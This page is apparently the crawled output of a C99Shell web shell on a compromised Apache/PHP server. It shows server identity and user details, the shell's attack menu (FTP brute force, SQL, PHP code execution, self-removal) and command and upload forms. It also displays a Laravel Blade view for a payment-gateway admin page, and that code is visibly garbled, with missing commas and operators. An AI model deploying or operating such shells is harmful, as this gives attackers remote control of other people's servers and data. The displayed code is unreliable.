!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/uploads/script/storage/framework/views/   drwxr-xr-x
Free 12.97 GB of 57.97 GB (22.38%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     cfeb227fa03a4e5b4552ef6f8f7907d57ba4eb45.php (2.44 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php $__env->startSection('head'); ?>
<?php 
echo $__env->make('layouts.partials.headersection',['title'=>'Payment Gateway'], \Illuminate\Support\Arr::except(get_defined_vars(), ['__data''__path']))->render(); ?>
<?php $__env
->stopSection(); ?>
<?php $__env
->startSection('content'); ?>
<div class="row">
  <div class="col-12 mt-2">
    <div class="card">
      <div class="card-body">        
          <div class="table-responsive">
            <table class="table table-striped table-hover text-center table-borderless">
              <thead>
                <tr>
                 

                  <th><i class="fas fa-image"></i></th>
                  <th><?php echo e(__('Name')); ?></th>
                  <th><?php echo e(__('Status')); ?></th>
                 
                  <th><?php echo e(__('Total Users')); ?></th>
                  
                  <th><?php echo e(__('Last Updated at')); ?></th>
                  <th><?php echo e(__('Edit')); ?></th>
                </tr>
              </thead>
              <tbody>
                <?php $__currentLoopData $posts$__env->addLoop($__currentLoopData); foreach($__currentLoopData as $row): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
                <tr>
                  <td><img src="<?php echo e(asset($row->preview->content ?? '')); ?>" alt="" height="50" width="120"></td>
                    <td><?php echo e($row->name); ?></td>
                    <td><?php if($row->featured==1): ?> <span class="badge badge-success"><?php echo e(__('Active')); ?></span> <?php else: ?> <span class="badge badge-danger"><?php echo e(__('Deactive')); ?></span> <?php endif; ?></td>
                    <td><?php echo e($row->gateway_users_count); ?></td>
                    <td><?php echo e($row->updated_at->diffForHumans()); ?></td>
                    <td><a href="<?php echo e(route('admin.payment-geteway.show',$row->slug)); ?>" class="btn btn-primary btn-sm"><i class="fa fa-edit"></i></a></td>
                </tr>
                <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>
              </tbody>
             
           </table>
         </div>
       </form>
     </div>
   </div>
 </div>
</div>
<?php $__env->stopSection(); ?>

<?php echo $__env->make('layouts.app'\Illuminate\Support\Arr::except(get_defined_vars(), ['__data''__path']))->render(); ?><?php /**PATH /Volumes/my-works/laravel/dokans/script/resources/views/admin/payment_gateway/index.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0056 ]--